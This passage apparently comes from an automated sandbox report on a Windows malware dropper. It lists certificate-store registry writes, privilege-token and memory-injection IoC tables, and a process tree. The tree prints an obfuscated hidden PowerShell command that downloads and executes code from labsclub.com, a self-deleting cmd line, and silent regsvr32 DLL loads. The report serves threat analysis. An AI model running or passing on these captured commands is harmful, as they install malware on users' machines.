f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	rfpvo2layxa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1232 PING.EXE

pid	process
1232	PING.EXE

Script User-Agent 16 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	233	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	238	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	264	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	103	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	108	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	213	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	221	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	87	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	323	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	331	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	90	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	206	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	217	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	236	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	92	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	131	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setups.tmpmultitimer.exe3a4so11jiil.tmpapipostback.exeIBInstaller_97039.tmpvpn.tmpregsvr32.exeWerFault.exeWerFault.exeWerFault.exe

pid	process
4092	setups.tmp
4092	setups.tmp
2764	multitimer.exe
2764	multitimer.exe
2764	multitimer.exe
2764	multitimer.exe
2764	multitimer.exe
2764	multitimer.exe
2764	multitimer.exe
2764	multitimer.exe
2764	multitimer.exe
4756	3a4so11jiil.tmp
4756	3a4so11jiil.tmp
4900	apipostback.exe
4900	apipostback.exe
4336	IBInstaller_97039.tmp
4336	IBInstaller_97039.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4848	regsvr32.exe
4848	regsvr32.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
1232	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
4060	WerFault.exe
5548	WerFault.exe
5548	WerFault.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MicrosoftEdgeCP.exetoolspab1.exe

pid process

1404 MicrosoftEdgeCP.exe
1404 MicrosoftEdgeCP.exe
3452 toolspab1.exe

pid	process
1404	MicrosoftEdgeCP.exe
1404	MicrosoftEdgeCP.exe
3452	toolspab1.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Five.exemultitimer.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemultitimer.exevpn.tmpKiffApp1.exemsiexec.exeWerFault.exerfpvo2layxa.exe

description	pid	process
Token: SeDebugPrivilege	3004	Five.exe
Token: SeDebugPrivilege	2764	multitimer.exe
Token: SeDebugPrivilege	2156	MicrosoftEdge.exe
Token: SeDebugPrivilege	2156	MicrosoftEdge.exe
Token: SeDebugPrivilege	2156	MicrosoftEdge.exe
Token: SeDebugPrivilege	2156	MicrosoftEdge.exe
Token: SeDebugPrivilege	4124	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4124	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4124	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4124	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2156	MicrosoftEdge.exe
Token: SeDebugPrivilege	4396	multitimer.exe
Token: SeDebugPrivilege	4364	vpn.tmp
Token: SeDebugPrivilege	4364	vpn.tmp
Token: SeDebugPrivilege	4988	KiffApp1.exe
Token: SeSecurityPrivilege	2236	msiexec.exe
Token: SeRestorePrivilege	1232	WerFault.exe
Token: SeBackupPrivilege	1232	WerFault.exe
Token: SeCreateTokenPrivilege	4284	rfpvo2layxa.exe
Token: SeAssignPrimaryTokenPrivilege	4284	rfpvo2layxa.exe
Token: SeLockMemoryPrivilege	4284	rfpvo2layxa.exe
Token: SeIncreaseQuotaPrivilege	4284	rfpvo2layxa.exe
Token: SeMachineAccountPrivilege	4284	rfpvo2layxa.exe
Token: SeTcbPrivilege	4284	rfpvo2layxa.exe
Token: SeSecurityPrivilege	4284	rfpvo2layxa.exe
Token: SeTakeOwnershipPrivilege	4284	rfpvo2layxa.exe
Token: SeLoadDriverPrivilege	4284	rfpvo2layxa.exe
Token: SeSystemProfilePrivilege	4284	rfpvo2layxa.exe
Token: SeSystemtimePrivilege	4284	rfpvo2layxa.exe
Token: SeProfSingleProcessPrivilege	4284	rfpvo2layxa.exe
Token: SeIncBasePriorityPrivilege	4284	rfpvo2layxa.exe
Token: SeCreatePagefilePrivilege	4284	rfpvo2layxa.exe
Token: SeCreatePermanentPrivilege	4284	rfpvo2layxa.exe
Token: SeBackupPrivilege	4284	rfpvo2layxa.exe
Token: SeRestorePrivilege	4284	rfpvo2layxa.exe
Token: SeShutdownPrivilege	4284	rfpvo2layxa.exe
Token: SeDebugPrivilege	4284	rfpvo2layxa.exe
Token: SeAuditPrivilege	4284	rfpvo2layxa.exe
Token: SeSystemEnvironmentPrivilege	4284	rfpvo2layxa.exe
Token: SeChangeNotifyPrivilege	4284	rfpvo2layxa.exe
Token: SeRemoteShutdownPrivilege	4284	rfpvo2layxa.exe
Token: SeUndockPrivilege	4284	rfpvo2layxa.exe
Token: SeSyncAgentPrivilege	4284	rfpvo2layxa.exe
Token: SeEnableDelegationPrivilege	4284	rfpvo2layxa.exe
Token: SeManageVolumePrivilege	4284	rfpvo2layxa.exe
Token: SeImpersonatePrivilege	4284	rfpvo2layxa.exe
Token: SeCreateGlobalPrivilege	4284	rfpvo2layxa.exe
Token: SeDebugPrivilege	1232	WerFault.exe
Token: SeCreateTokenPrivilege	4284	rfpvo2layxa.exe
Token: SeAssignPrimaryTokenPrivilege	4284	rfpvo2layxa.exe
Token: SeLockMemoryPrivilege	4284	rfpvo2layxa.exe
Token: SeIncreaseQuotaPrivilege	4284	rfpvo2layxa.exe
Token: SeMachineAccountPrivilege	4284	rfpvo2layxa.exe
Token: SeTcbPrivilege	4284	rfpvo2layxa.exe
Token: SeSecurityPrivilege	4284	rfpvo2layxa.exe
Token: SeTakeOwnershipPrivilege	4284	rfpvo2layxa.exe
Token: SeLoadDriverPrivilege	4284	rfpvo2layxa.exe
Token: SeSystemProfilePrivilege	4284	rfpvo2layxa.exe
Token: SeSystemtimePrivilege	4284	rfpvo2layxa.exe
Token: SeProfSingleProcessPrivilege	4284	rfpvo2layxa.exe
Token: SeIncBasePriorityPrivilege	4284	rfpvo2layxa.exe
Token: SeCreatePagefilePrivilege	4284	rfpvo2layxa.exe
Token: SeCreatePermanentPrivilege	4284	rfpvo2layxa.exe
Token: SeBackupPrivilege	4284	rfpvo2layxa.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

3a4so11jiil.tmpSetup3310.tmpIBInstaller_97039.tmpvpn.tmprfpvo2layxa.exe

pid	process
4756	3a4so11jiil.tmp
3104	Setup3310.tmp
4336	IBInstaller_97039.tmp
4364	vpn.tmp
4284	rfpvo2layxa.exe
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exegoogle-game.exeConhost.exe

pid	process
2156	MicrosoftEdge.exe
1404	MicrosoftEdgeCP.exe
1404	MicrosoftEdgeCP.exe
4872	MicrosoftEdge.exe
5968	MicrosoftEdgeCP.exe
5968	MicrosoftEdgeCP.exe
6244	MicrosoftEdge.exe
6276	MicrosoftEdgeCP.exe
6276	MicrosoftEdgeCP.exe
4232	google-game.exe
4232	google-game.exe
3012	Conhost.exe
3012	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Five.exesetups.exemultitimer.exemultitimer.exeMicrosoftEdgeCP.exemultitimer.exe3a4so11jiil.exe3a4so11jiil.tmppx5ycqsshlk.exeSetup3310.exeWerFault.exevpn.exeIBInstaller_97039.tmp

description	pid	process	target process
PID 3004 wrote to memory of 2764	3004	Five.exe	multitimer.exe
PID 3004 wrote to memory of 2764	3004	Five.exe	multitimer.exe
PID 3004 wrote to memory of 3116	3004	Five.exe	setups.exe
PID 3004 wrote to memory of 3116	3004	Five.exe	setups.exe
PID 3004 wrote to memory of 3116	3004	Five.exe	setups.exe
PID 3116 wrote to memory of 4092	3116	setups.exe	setups.tmp
PID 3116 wrote to memory of 4092	3116	setups.exe	setups.tmp
PID 3116 wrote to memory of 4092	3116	setups.exe	setups.tmp
PID 2764 wrote to memory of 4320	2764	multitimer.exe	multitimer.exe
PID 2764 wrote to memory of 4320	2764	multitimer.exe	multitimer.exe
PID 4320 wrote to memory of 4396	4320	multitimer.exe	multitimer.exe
PID 4320 wrote to memory of 4396	4320	multitimer.exe	multitimer.exe
PID 1404 wrote to memory of 4124	1404	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1404 wrote to memory of 4124	1404	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1404 wrote to memory of 4124	1404	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1404 wrote to memory of 4124	1404	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1404 wrote to memory of 4124	1404	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4396 wrote to memory of 4720	4396	multitimer.exe	3a4so11jiil.exe
PID 4396 wrote to memory of 4720	4396	multitimer.exe	3a4so11jiil.exe
PID 4396 wrote to memory of 4720	4396	multitimer.exe	3a4so11jiil.exe
PID 4720 wrote to memory of 4756	4720	3a4so11jiil.exe	3a4so11jiil.tmp
PID 4720 wrote to memory of 4756	4720	3a4so11jiil.exe	3a4so11jiil.tmp
PID 4720 wrote to memory of 4756	4720	3a4so11jiil.exe	3a4so11jiil.tmp
PID 4396 wrote to memory of 4836	4396	multitimer.exe	0c41bq5hfhj.exe
PID 4396 wrote to memory of 4836	4396	multitimer.exe	0c41bq5hfhj.exe
PID 4396 wrote to memory of 4836	4396	multitimer.exe	0c41bq5hfhj.exe
PID 4396 wrote to memory of 4828	4396	multitimer.exe	px5ycqsshlk.exe
PID 4396 wrote to memory of 4828	4396	multitimer.exe	px5ycqsshlk.exe
PID 4396 wrote to memory of 4828	4396	multitimer.exe	px5ycqsshlk.exe
PID 4756 wrote to memory of 4900	4756	3a4so11jiil.tmp	apipostback.exe
PID 4756 wrote to memory of 4900	4756	3a4so11jiil.tmp	apipostback.exe
PID 4756 wrote to memory of 4900	4756	3a4so11jiil.tmp	apipostback.exe
PID 4828 wrote to memory of 4976	4828	px5ycqsshlk.exe	cmd.exe
PID 4828 wrote to memory of 4976	4828	px5ycqsshlk.exe	cmd.exe
PID 4828 wrote to memory of 4976	4828	px5ycqsshlk.exe	cmd.exe
PID 4396 wrote to memory of 4988	4396	multitimer.exe	KiffApp1.exe
PID 4396 wrote to memory of 4988	4396	multitimer.exe	KiffApp1.exe
PID 4396 wrote to memory of 5024	4396	multitimer.exe	WerFault.exe
PID 4396 wrote to memory of 5024	4396	multitimer.exe	WerFault.exe
PID 4396 wrote to memory of 5024	4396	multitimer.exe	WerFault.exe
PID 4396 wrote to memory of 5068	4396	multitimer.exe	Setup3310.exe
PID 4396 wrote to memory of 5068	4396	multitimer.exe	Setup3310.exe
PID 4396 wrote to memory of 5068	4396	multitimer.exe	Setup3310.exe
PID 4396 wrote to memory of 5088	4396	multitimer.exe	app.exe
PID 4396 wrote to memory of 5088	4396	multitimer.exe	app.exe
PID 4396 wrote to memory of 5088	4396	multitimer.exe	app.exe
PID 4396 wrote to memory of 4280	4396	multitimer.exe	vpn.exe
PID 4396 wrote to memory of 4280	4396	multitimer.exe	vpn.exe
PID 4396 wrote to memory of 4280	4396	multitimer.exe	vpn.exe
PID 5068 wrote to memory of 3104	5068	Setup3310.exe	Setup3310.tmp
PID 5068 wrote to memory of 3104	5068	Setup3310.exe	Setup3310.tmp
PID 5068 wrote to memory of 3104	5068	Setup3310.exe	Setup3310.tmp
PID 5024 wrote to memory of 4336	5024	WerFault.exe	IBInstaller_97039.tmp
PID 5024 wrote to memory of 4336	5024	WerFault.exe	IBInstaller_97039.tmp
PID 5024 wrote to memory of 4336	5024	WerFault.exe	IBInstaller_97039.tmp
PID 4280 wrote to memory of 4364	4280	vpn.exe	vpn.tmp
PID 4280 wrote to memory of 4364	4280	vpn.exe	vpn.tmp
PID 4280 wrote to memory of 4364	4280	vpn.exe	vpn.tmp
PID 4396 wrote to memory of 4284	4396	multitimer.exe	rfpvo2layxa.exe
PID 4396 wrote to memory of 4284	4396	multitimer.exe	rfpvo2layxa.exe
PID 4396 wrote to memory of 4284	4396	multitimer.exe	rfpvo2layxa.exe
PID 4336 wrote to memory of 2924	4336	IBInstaller_97039.tmp	cmd.exe
PID 4336 wrote to memory of 2924	4336	IBInstaller_97039.tmp	cmd.exe
PID 4336 wrote to memory of 2924	4336	IBInstaller_97039.tmp	cmd.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:60

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1036

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1276

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1208

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2436

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2656

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2684

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2724

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1812

C:\Users\Admin\AppData\Local\Temp\Five.exe
"C:\Users\Admin\AppData\Local\Temp\Five.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004

C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
2⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764

C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe" 1 3.1618062453.6071ac75c7623 105
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4320

C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe" 2 3.1618062453.6071ac75c7623
4⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4396

C:\Users\Admin\AppData\Local\Temp\foinfaawdh2\3a4so11jiil.exe
"C:\Users\Admin\AppData\Local\Temp\foinfaawdh2\3a4so11jiil.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4720

C:\Users\Admin\AppData\Local\Temp\is-H6PGT.tmp\3a4so11jiil.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H6PGT.tmp\3a4so11jiil.tmp" /SL5="$3022E,140785,56832,C:\Users\Admin\AppData\Local\Temp\foinfaawdh2\3a4so11jiil.exe" /VERYSILENT
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4756

C:\Users\Admin\AppData\Local\Temp\is-T1PRT.tmp\apipostback.exe
"C:\Users\Admin\AppData\Local\Temp\is-T1PRT.tmp\apipostback.exe" adan adan
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4900

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\N97tfgNnM.dll"
8⤵
PID:1264

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\N97tfgNnM.dll"
9⤵
- Loads dropped DLL
PID:580

C:\Windows\system32\regsvr32.exe
/s "C:\Users\Admin\AppData\Local\Temp\N97tfgNnM.dll"
10⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4848

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\N97tfgNnM.dll51aMKTCFM.dll"
8⤵
PID:5884

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\N97tfgNnM.dll51aMKTCFM.dll"
9⤵
PID:5004

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
8⤵
PID:2108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
9⤵
- Blocklisted process makes network request
PID:6864

C:\Users\Admin\AppData\Local\Temp\iwmea4mjz5o\px5ycqsshlk.exe
"C:\Users\Admin\AppData\Local\Temp\iwmea4mjz5o\px5ycqsshlk.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4828

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\iwmea4mjz5o\px5ycqsshlk.exe"
6⤵
PID:4976

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
7⤵
- Runs ping.exe
PID:1232

C:\Users\Admin\AppData\Local\Temp\4pfds1eckio\0c41bq5hfhj.exe
"C:\Users\Admin\AppData\Local\Temp\4pfds1eckio\0c41bq5hfhj.exe" /ustwo INSTALL
5⤵
- Executes dropped EXE
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 648
6⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 664
6⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 700
6⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:5548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 816
6⤵
- Program crash
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 816
6⤵
- Program crash
PID:5928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 948
6⤵
- Program crash
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1092
6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Program crash
- Suspicious use of WriteProcessMemory
PID:5024

C:\Users\Admin\AppData\Local\Temp\pkp3ttezvv5\KiffApp1.exe
"C:\Users\Admin\AppData\Local\Temp\pkp3ttezvv5\KiffApp1.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4988

C:\Users\Admin\AppData\Local\Temp\reht4jrs51m\app.exe
"C:\Users\Admin\AppData\Local\Temp\reht4jrs51m\app.exe" /8-23
5⤵
- Executes dropped EXE
PID:5088

C:\Users\Admin\AppData\Local\Temp\reht4jrs51m\app.exe
"C:\Users\Admin\AppData\Local\Temp\reht4jrs51m\app.exe" /8-23
6⤵
- Modifies data under HKEY_USERS
PID:1576

C:\Users\Admin\AppData\Local\Temp\ulgrx0ir5qr\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\ulgrx0ir5qr\vpn.exe" /silent /subid=482
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4280

C:\Users\Admin\AppData\Local\Temp\is-9N3KO.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9N3KO.tmp\vpn.tmp" /SL5="$9004C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ulgrx0ir5qr\vpn.exe" /silent /subid=482
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
